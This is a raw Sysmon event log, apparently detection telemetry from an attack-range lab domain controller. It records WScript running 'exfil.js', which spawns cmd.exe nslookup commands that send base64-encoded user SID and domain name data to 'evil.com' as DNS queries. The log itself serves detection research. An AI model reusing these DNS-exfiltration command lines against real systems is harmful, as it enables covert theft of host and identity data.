14:16:27.906{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199437Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.906{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199436Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.906{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17BB-629A-1040-000000005F02}1344C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199435Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.905{2E1864BB-17BB-629A-0E40-000000005F02}61405416C:\Windows\system32\cmd.exe{2E1864BB-17BB-629A-1040-000000005F02}1344C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199434Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.905{2E1864BB-17BB-629A-1040-000000005F02}1344C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAw evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BB-629A-0E40-000000005F02}6140C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAw evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlovrbe.tmp 2>&1 10341000x8000000000000000199433Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.884{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17BB-629A-0F40-000000005F02}1660C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199432Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.884{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BB-629A-0F40-000000005F02}1660C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199431Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.869{2E1864BB-17BB-629A-0F40-000000005F02}16603588C:\Windows\system32\conhost.exe{2E1864BB-17BB-629A-0E40-000000005F02}6140C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199430Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.869{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17BB-629A-0F40-000000005F02}1660C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199429Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.869{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199428Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.869{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199427Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.869{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199426Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.869{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199425Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.853{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17BB-629A-0E40-000000005F02}6140C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199424Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.853{2E1864BB-17A1-629A-783D-000000005F02}55522108C:\Windows\System32\WScript.exe{2E1864BB-17BB-629A-0E40-000000005F02}6140C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199423Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.868{2E1864BB-17BB-629A-0E40-000000005F02}6140C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAw evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlovrbe.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000199422Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.853{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlcmga.tmpMD5=FB20CB6722435F1F35A02C74A813F0C5,SHA256=8013914F02524B11209965048D9BE8D67580A0B87255186F58E48D3DD646BD34,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000199421Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.838{2E1864BB-17BB-629A-0C40-000000005F02}79327308C:\Windows\system32\conhost.exe{2E1864BB-17BB-629A-0D40-000000005F02}7848C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199420Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.838{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199419Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.838{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199418Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.838{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199417Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.838{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199416Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.838{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BB-629A-0D40-000000005F02}7848C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199415Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.838{2E1864BB-17BB-629A-0B40-000000005F02}20366396C:\Windows\system32\cmd.exe{2E1864BB-17BB-629A-0D40-000000005F02}7848C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199414Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.840{2E1864BB-17BB-629A-0D40-000000005F02}7848C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BB-629A-0B40-000000005F02}2036C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcmga.tmp 2>&1 10341000x8000000000000000199413Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.806{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17BB-629A-0C40-000000005F02}7932C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199412Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.806{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BB-629A-0C40-000000005F02}7932C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199411Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.806{2E1864BB-17BB-629A-0C40-000000005F02}79327308C:\Windows\system32\conhost.exe{2E1864BB-17BB-629A-0B40-000000005F02}2036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199410Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.801{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BB-629A-0C40-000000005F02}7932C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199409Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.785{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199408Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.785{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199407Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 